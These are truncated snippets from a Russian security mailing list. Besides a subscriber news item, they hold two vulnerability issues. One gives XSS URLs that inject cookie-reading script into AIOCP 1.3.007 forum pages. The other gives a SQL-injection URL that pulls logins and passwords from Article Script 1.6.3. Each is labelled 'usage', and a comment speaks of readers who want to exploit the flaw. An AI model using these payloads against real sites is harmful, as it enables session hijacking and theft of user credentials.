Компьютер для продвинутых пользоватлей Выпус по безопасности. Новости расслыки.
Компьютер для продвинутых пользователей В этом выпуске: Новости рассылки Новости рассылки. Здравствуй, дорогой подписчик. Перво-наперво хочу поздравить Вас с тем, что количество выходов нашей рассылке перевалило за трёхсотенный рубеж. Неплохо для специализированной рассылки. В связи с этим событием на меня нашла идея пересмотреть формат выхода рассылки. Немного подумав и посчитав, пришёл к выводу, что читать маленькие выпуски по отдельным продуктам - сложно, да и к тому же на трафик сказывается не в положи...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Множественные уязвимости в AIOCP.
Компьютер для продвинутых пользователей В этом выпуске: AIOCP ПО: AIOCP Версия: 1.3.007 Использование: - /public/code/cp_forum_view.php?fmode=top&topid=</textarea><script>alert(document.cookie)</script> - /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea><script>alert(document.cookie)</script> - /public/code/cp_forum_view.php?fmode=top&anp;topid=53&forid=23&catid=</textarea><script>alert(document.cookie)</script> - /public/code/cp_dpage.php?ch...
Компьютер для продвинутых пользоватлей Выпус по безопасности. SQL-уязвимость в Article Script.
Компьютер для продвинутых пользователей В этом выпуске: Article Script ПО: Article Script Версия: 1.6.3 Уязвимость : Функция category не проверяет переменные до выполнения, что позволяет на провести SQL-инъекцию и получить данный по пользователям. Использование : http://www.victim.com/articles/rss.php?category-1/*/union/*/select/*/1,2,login,password/*/from/*/users/* Комментарий : Поискал данный скрипт в Рунете, но страниц с ним не нашёл. Видимо тем, кто хочет использовать эту, уязвимость придётся трясти бу...